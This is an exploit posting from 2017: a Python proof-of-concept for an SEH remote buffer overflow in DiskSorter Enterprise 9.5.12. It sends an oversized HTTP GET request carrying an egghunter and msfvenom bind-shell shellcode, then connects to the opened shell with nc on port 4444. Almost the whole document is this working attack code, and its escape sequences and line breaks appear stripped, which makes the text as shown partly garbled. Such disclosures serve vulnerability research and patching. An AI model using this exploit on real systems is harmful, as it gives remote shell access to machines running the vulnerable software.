Disk Sorter Enterprise 9.5.12 Buffer Overflow
Posted on 22 March 2017
#!/usr/bin/env python # Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH) # Date: 2017-03-22 # Exploit Author: Daniel Teixeira # Author Homepage: www.danielteixeira.com # Vendor Homepage: http://www.disksorter.com # Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe # Version: 9.5.12 # Tested on: Windows 7 SP1 x86 import socket,os,time,struct host = "192.168.2.186" port = 80 #Bad Chars x00x09x0ax0dx20" #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "x00x09x0ax0dx20" -f python shellcode = "" shellcode += "xd9xc0xd9x74x24xf4x5exbfxb0x9bx0exf2x33" shellcode += "xc9xb1x53x31x7ex17x83xeexfcx03xcex88xec" shellcode += "x07xd2x47x72xe7x2ax98x13x61xcfxa9x13x15" shellcode += "x84x9axa3x5dxc8x16x4fx33xf8xadx3dx9cx0f" shellcode += "x05x8bxfax3ex96xa0x3fx21x14xbbx13x81x25" shellcode += "x74x66xc0x62x69x8bx90x3bxe5x3ex04x4fxb3" shellcode += "x82xafx03x55x83x4cxd3x54xa2xc3x6fx0fx64" shellcode += "xe2xbcx3bx2dxfcxa1x06xe7x77x11xfcxf6x51" shellcode += "x6bxfdx55x9cx43x0cxa7xd9x64xefxd2x13x97" shellcode += "x92xe4xe0xe5x48x60xf2x4ex1axd2xdex6fxcf" shellcode += "x85x95x7cxa4xc2xf1x60x3bx06x8ax9dxb0xa9" shellcode += "x5cx14x82x8dx78x7cx50xafxd9xd8x37xd0x39" shellcode += "x83xe8x74x32x2exfcx04x19x27x31x25xa1xb7" shellcode += "x5dx3exd2x85xc2x94x7cxa6x8bx32x7bxc9xa1" shellcode += "x83x13x34x4axf4x3axf3x1exa4x54xd2x1ex2f" shellcode += "xa4xdbxcaxdaxacx7axa5xf8x51x3cx15xbdxf9" shellcode += "xd5x7fx32x26xc5x7fx98x4fx6ex82x23x7ex33" shellcode += "x0bxc5xeaxdbx5dx5dx82x19xbax56x35x61xe8" shellcode += "xcexd1x2axfaxc9xdexaax28x7ex48x21x3fxba" shellcode += "x69x36x6axeaxfexa1xe0x7bx4dx53xf4x51x25" shellcode += "xf0x67x3exb5x7fx94xe9xe2x28x6axe0x66xc5" shellcode += "xd5x5ax94x14x83xa5x1cxc3x70x2bx9dx86xcd" shellcode += "x0fx8dx5excdx0bxf9x0ex98xc5x57xe9x72xa4" shellcode += "x01xa3x29x6exc5x32x02xb1x93x3ax4fx47x7b" shellcode += "x8ax26x1ex84x23xafx96xfdx59x4fx58xd4xd9" shellcode += "x7fx13x74x4bxe8xfaxedxc9x75xfdxd8x0ex80" shellcode += "x7exe8xeex77x9ex99xebx3cx18x72x86x2dxcd" shellcode += "x74x35x4dxc4" #Buffer overflow junk = "A" * 2487 #JMP Short = EB 05 nSEH = "x90x90xEBx05" #Jump short 5 #POP POP RET (libspp.dll) SEH = struct.pack('<L',0x10015FFE) #Generated by mona.py v2.0, rev 568 - Immunity Debugger egg = "w00tw00t" egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7" #NOPS nops = "x90" #Payload payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) - len(shellcode)) #HTTP Request request = "GET /" + payload + "HTTP/1.1" + " " request += "Host: " + host + " " request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + " " request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + " " request += "Accept-Language: en-US,en;q=0.5" + " " request += "Accept-Encoding: gzip, deflate" + " " request += "Connection: keep-alive" + " " socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket.connect((host,port)) socket.send(request) socket.close() print "Waiting for shell..." time.sleep(10) os.system("nc " + host + " 4444")
